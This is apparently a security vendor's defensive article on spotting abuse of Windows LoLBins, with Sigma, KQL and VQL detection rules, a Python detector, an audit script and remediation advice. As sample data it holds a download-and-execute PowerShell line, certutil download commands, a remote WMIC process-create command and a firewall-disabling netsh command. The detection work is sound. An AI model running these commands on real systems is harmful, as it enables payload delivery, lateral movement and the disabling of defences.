
LoLBin TTPs: Detecting Abuse of PowerShell, Certutil, and WMIC Based on Bitdefender Analysis

Security Arsenal Team
May 16, 2026

Bitdefender's recent analysis, "What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack Surface," delivers a critical wake-up call for the security industry. After 45 days of monitoring their own administrative telemetry, researchers confirmed what incident responders have known for years: the most dangerous activity inside an organization does not look like malware; it looks like administration.

The modern attack surface is defined not by zero-day vulnerabilities but by the abuse of trusted utilities: Living-off-the-Land Binaries (LoLBins). Tools like PowerShell, WMIC, netsh, Certutil, and MSBuild are Microsoft-signed, trusted, and ship with Windows or the .NET Framework. Because they are essential for IT operations, they are allow-listed by default, which gives threat actors near-perfect camouflage. The analysis underlines the need for defenders to move beyond signature-based detection toward behavioral anomaly detection (what was run, by whom, and from which parent process) and strict configuration control.

Technical Analysis

The Threat: Living-off-the-Land (LotL)

Affected Products/Platforms:

  • Operating Systems: Microsoft Windows (Server and Client versions)
  • Key Binaries (LoLBins): powershell.exe, certutil.exe, wmic.exe, netsh.exe, msbuild.exe.

The Attack Mechanism: Threat actors leverage these pre-installed, signed tools to perform malicious actions that pass standard allow-lists and antivirus heuristics.

  • PowerShell: Used for execution, in-memory code injection, and lateral movement, typically with -EncodedCommand or a hidden window to keep the script body off the visible command line.
  • Certutil: Built for certificate management, widely abused to download payloads from remote URLs (certutil -urlcache -split -f <URL> <file>) or to decode Base64-encoded files (certutil -decode).
  • WMIC: Used for system reconnaissance and for process execution on local or remote hosts (wmic /node:<host> process call create ...). Microsoft has deprecated WMIC and recent Windows 11 releases no longer install it by default, so its presence on such hosts is itself worth a look.
  • MSBuild: Abused to compile and run inline C# embedded in a project file, serving as a fileless loader that executes under a Microsoft-signed binary.
  • Netsh: Used to change network configuration, often to disable the host firewall (netsh advfirewall set allprofiles state off) or to forward traffic through the host (netsh interface portproxy).

Exploitation Status: Confirmed Active. LoLBin abuse is a staple of modern ransomware operations, nation-state intrusions (e.g., APT29), and commodity malware loaders. Because it is a TTP (Tactics, Techniques, and Procedures) rather than a specific CVE, there is nothing to patch; the exposure is the configuration of the environment itself, and it is closed through logging, application control, and privilege reduction rather than an update.

Detection & Response

Detecting LoLBin abuse requires identifying anomalous command-line arguments and parent-child process relationships (an Office application, browser, or web server worker spawning certutil or encoded PowerShell) that deviate from the organisation's administrative baseline. Where the telemetry allows, match on the binary's original file name as well as its path, since renaming the executable defeats a path-only rule.

SIGMA Rules

YAML
---
title: Potential Certutil Download Activity
id: 1a23b456-7890-12cd-34ef-567890abcdef
status: experimental
description: Detects certutil invoked with switches that fetch remote content (urlcache, verifyctl), a common LOLBin download technique. Matches both the '-' and '/' switch prefixes certutil accepts.
references:
  - https://attack.mitre.org/techniques/T1105/
  - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\certutil.exe'
    - OriginalFileName: 'CertUtil.exe'
  selection_cli:
    CommandLine|contains:
      - '-urlcache'
      - '/urlcache'
      - '-verifyctl'
      - '/verifyctl'
  condition: all of selection_*
falsepositives:
  - Legitimate certificate-store administration (urlcache is rarely needed for this). certutil -ping is routinely used by PKI administrators and is deliberately not matched.
level: high
---
title: Suspicious PowerShell Encoded Command
id: 2b34c567-8901-23de-45fa-678901bcdef2
status: experimental
description: Detects powershell.exe or pwsh.exe launched with an encoded command (-EncodedCommand and the abbreviations PowerShell accepts), commonly used to hide the script body from the command line.
references:
  - https://attack.mitre.org/techniques/T1059/001/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith:
        - '\powershell.exe'
        - '\pwsh.exe'
    - OriginalFileName: 'PowerShell.EXE'
  selection_cli:
    CommandLine|contains:
      - ' -e '
      - ' -ec '
      - ' -en '
      - ' -enc '
      - ' -enco '
      - ' -encod '
      - ' -encode '
      - ' -encoded '
      - ' -encodedcommand '
  condition: all of selection_*
falsepositives:
  - Management agents that legitimately launch encoded commands. Do not exclude them by a keyword in the CommandLine (an attacker can add the same keyword); baseline them by ParentImage and add an organisation-specific filter.
level: medium
---
title: WMIC Process Call Creation
id: 3c45d678-9012-34ef-56ab-789012cdef34
status: experimental
description: Detects WMIC spawning a process with 'process call create', locally or against a remote host via /node, commonly used for lateral movement and LOLBin execution.
references:
  - https://attack.mitre.org/techniques/T1047/
  - https://lolbas-project.github.io/lolbas/Binaries/Wmic/
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1047
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\wmic.exe'
    - OriginalFileName: 'wmic.exe'
  selection_cli:
    CommandLine|contains|all:
      - 'process'
      - 'call'
      - 'create'
  condition: all of selection_*
falsepositives:
  - Legacy system management scripts. WMIC is deprecated and absent by default on recent Windows 11 releases, so sightings there deserve extra scrutiny.
level: high
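The three rules above, and the abuse patterns listed under The Attack Mechanism, exercised as an added Python example over constructed Sysmon-style process-creation (Event ID 1) records. This is not Bitdefender's or Security Arsenal's code; every event, host name and IP address below is made up (198.51.100.7 is documentation space). It goes a little beyond the Sigma logic in two ways a practitioner would want: it normalises certutil's '-'/'/' switch prefix and the abbreviations and dash variants powershell.exe accepts, and it decodes the -EncodedCommand payload to show what Script Block Logging would surface.

```python
"""Run the certutil, PowerShell and WMIC LoLBin detections over constructed
Sysmon-style process-creation records. Added example for this article, not
Bitdefender's or Security Arsenal's code; all events below are made up."""
import base64


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed payloads (documentation-range IP, not a real host).
SCRIPT_A = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
SCRIPT_B = "Get-Date"

# Constructed sample events with the Sysmon EID 1 fields the rules need.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.exe"},
    # Same behaviour with '/' switches and mixed case: evades a literal '-urlcache' match.
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"CertUtil /UrlCache /Split /F http://198.51.100.7/b.txt b.exe"},
    # Benign certificate-store administration: must not fire.
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": "certutil -store My"},
    # Office spawning hidden, encoded PowerShell: the classic maldoc chain.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -e " + encode_ps(SCRIPT_A)},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "pwsh.exe -NoProfile -EncodedCommand " + encode_ps(SCRIPT_B)},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /node:FILESRV01 process call create "cmd /c whoami > \\FILESRV01\c$\o.txt"'},
    # Recon via WMIC without process creation: must not fire this rule.
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get caption"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# powershell.exe also accepts '/' as the switch prefix and treats en/em dashes like '-'.
PS_SWITCH_PREFIXES = ("-", "/", "\u2013", "\u2014")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def encoded_command_payload(cmdline: str):
    """Return the argument to -EncodedCommand (or any abbreviation PowerShell accepts), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(PS_SWITCH_PREFIXES):
            continue
        switch = tok[1:].lower()
        # Any prefix of 'encodedcommand' works (-e, -en, -enc, ...), plus the alias -ec.
        if switch and (switch == "ec" or "encodedcommand".startswith(switch)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str):
    """Reverse the encoding; None when the argument is not valid base64 or not UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event: dict):
    """Apply the three rules to one event; return the rule name or None."""
    image, cmd = basename(event["Image"]), event["CommandLine"]
    if image == "certutil.exe":
        # certutil accepts '-' or '/' switches, case-insensitively: normalise before matching.
        switches = {t[1:].lower() for t in cmd.split() if t.startswith(("-", "/"))}
        if switches & {"urlcache", "verifyctl"}:
            return "certutil_download"
    elif image in ("powershell.exe", "pwsh.exe"):
        if encoded_command_payload(cmd) is not None:
            return "powershell_encoded"
    elif image == "wmic.exe":
        if "process call create" in " ".join(cmd.lower().split()):
            return "wmic_process_create"
    return None


def triage(events):
    """Run detect() over a batch and add the context an analyst wants: parent and decoded payload."""
    findings = []
    for ev in events:
        rule = detect(ev)
        if rule is None:
            continue
        parent = basename(ev["ParentImage"])
        finding = {"rule": rule, "image": basename(ev["Image"]), "parent": parent,
                   "parent_is_office": parent in OFFICE_PARENTS}
        if rule == "powershell_encoded":
            # What Script Block Logging (Event ID 4104) would show without manual decoding.
            finding["decoded"] = decode_encoded_command(encoded_command_payload(ev["CommandLine"]))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Two of the seven constructed events are deliberately benign and produce no finding; the two encoded PowerShell hits come back with the clear-text script attached, and the one launched from WINWORD.EXE carries a parent flag, which is the kind of enrichment that turns a medium-severity rule into something worth paging on.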

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for LoLBin abuse: certutil downloads, encoded PowerShell, and WMIC process creation.
// Match on the PE OriginalFileName with the case-insensitive =~ operator so renamed copies are
// still caught; DeviceProcessEvents exposes the command line as ProcessCommandLine, not CommandLine.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (ProcessVersionInfoOriginalFileName =~ "certutil.exe"
          and (ProcessCommandLine contains "urlcache" or ProcessCommandLine contains "verifyctl"))
    or ((ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE" or FileName =~ "pwsh.exe")
          and (ProcessCommandLine contains " -enc" or ProcessCommandLine contains " -encodedcommand"
               or ProcessCommandLine contains " -e " or ProcessCommandLine contains " -ec "))
    or (ProcessVersionInfoOriginalFileName =~ "wmic.exe" and ProcessCommandLine contains "process call create")
| project Timestamp, DeviceName, AccountName, FolderPath, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by Timestamp desc

Velociraptor VQL

pslist() is a live snapshot, so this query only catches LoLBins still running when the hunt executes; short-lived certutil or wmic invocations are better hunted from Sysmon Event ID 1 or Security Event ID 4688 records with parse_evtx(). Note that =~ is a regular-expression match in VQL, so the patterns below are anchored and case-insensitive, and the AND/OR grouping is made explicit with parentheses.

VQL — Velociraptor
-- Hunt for suspicious LoLBin command lines among running processes
SELECT Pid, Ppid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE (Name =~ '(?i)^certutil[.]exe$'
         AND CommandLine =~ '(?i)[-/](urlcache|verifyctl)')
   OR (Name =~ '(?i)^(powershell|pwsh)[.]exe$'
         AND CommandLine =~ '(?i) [-/](e|ec|en|enc[a-z]*) ')
   OR (Name =~ '(?i)^wmic[.]exe$'
         AND CommandLine =~ '(?i)process +call +create')

Audit Script (PowerShell)

This script performs a read-only assessment of PowerShell logging (Script Block, Module, and Transcription policy keys) and of whether AppLocker is running with rules actually in effect. It reports gaps but does not change configuration; run it in an elevated session.

PowerShell
# Audit PowerShell logging (Script Block, Module, Transcription) and AppLocker status.
# Read-only: reports gaps, changes nothing. Run as administrator.
$PsPolicy = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell"

Write-Host "[+] Checking PowerShell Script Block Logging..." -ForegroundColor Cyan
$ScriptBlockLog = Get-ItemProperty "$PsPolicy\ScriptBlockLogging" -ErrorAction SilentlyContinue
if ($ScriptBlockLog.EnableScriptBlockLogging -eq 1) {
    Write-Host "    [*] Script Block Logging is ENABLED (Event ID 4104 will carry decoded script content)." -ForegroundColor Green
} else {
    Write-Host "    [!] Script Block Logging is NOT ENFORCED. Recommend enabling via GPO." -ForegroundColor Red
}

Write-Host "[+] Checking Module Logging..." -ForegroundColor Cyan
$ModuleLog = Get-ItemProperty "$PsPolicy\ModuleLogging" -ErrorAction SilentlyContinue
if ($ModuleLog.EnableModuleLogging -eq 1) {
    Write-Host "    [*] Module Logging is ENABLED." -ForegroundColor Green
} else {
    Write-Host "    [!] Module Logging is NOT ENFORCED. Recommend enabling via GPO." -ForegroundColor Red
}

Write-Host "[+] Checking Transcription..." -ForegroundColor Cyan
$Transcription = Get-ItemProperty "$PsPolicy\Transcription" -ErrorAction SilentlyContinue
if ($Transcription.EnableTranscripting -eq 1) {
    Write-Host "    [*] Transcription is ENABLED (output directory: $($Transcription.OutputDirectory))." -ForegroundColor Green
} else {
    Write-Host "    [!] Transcription is NOT ENFORCED. Recommend enabling via GPO with a write-only central share." -ForegroundColor Red
}

Write-Host "[+] Checking AppLocker..." -ForegroundColor Cyan
$AppIDsvc = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
if ($AppIDsvc.Status -eq 'Running') {
    Write-Host "    [*] Application Identity service (AppIDSvc) is running." -ForegroundColor Green
    # A running service is necessary but not sufficient: count the rules actually in effect.
    $Policy = Get-AppLockerPolicy -Effective -ErrorAction SilentlyContinue
    $RuleCount = ($Policy.RuleCollections | Measure-Object -Property Count -Sum).Sum
    if ($RuleCount -gt 0) {
        Write-Host "    [*] $RuleCount effective AppLocker rule(s) found." -ForegroundColor Green
    } else {
        Write-Host "    [!] No effective AppLocker rules. Rules are required to restrict LoLBins such as certutil.exe and msbuild.exe." -ForegroundColor Red
    }
} else {
    Write-Host "    [!] Application Identity service is not running; AppLocker rules are not enforced." -ForegroundColor Red
}

Remediation

Mitigating the risks associated with LoLBins requires a defense-in-depth approach focused on reducing the utility of these tools for attackers while maintaining administrative functionality.

  1. Enable Advanced PowerShell Logging:

    • Action: Enable Module Logging, Script Block Logging, and Transcription via Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell), and forward the resulting events (Microsoft-Windows-PowerShell/Operational, Event ID 4104 for script blocks) to a central SIEM such as Sentinel.
    • Why: Script Block Logging records the de-obfuscated script as it is compiled, so content hidden behind -EncodedCommand on the command line is still captured.
    • Reference: Microsoft PowerShell Logging
  2. Implement Application Control (AppLocker/WDAC):

    • Action: Deploy Windows Defender Application Control (WDAC) or AppLocker to restrict execution of binaries such as msbuild.exe, certutil.exe, and wmic.exe to specific trusted users or paths, and remove the optional PowerShell 2.0 engine, which predates Script Block Logging and bypasses it.
    • Why: Prevents standard users (and compromised standard accounts) from leveraging admin tools, and turns every blocked attempt into an auditable event.
  3. Reduce Administrative Privileges:

    • Action: Enforce Just-In-Time (JIT) access and Just Enough Administration (JEA).
    • Why: If the attacker compromises a standard user account, they cannot execute the high-privilege commands often chained with LoLBins.
  4. Network Segmentation and Egress Filtering:

    • Action: Block outbound internet access for systems that do not require it, and use Windows Firewall per-program outbound rules or proxy policy to stop certutil.exe and powershell.exe from reaching external addresses.
    • Why: Severely hampers the ability of LoLBins to download second-stage payloads; a blocked download attempt also leaves a firewall log entry worth alerting on.
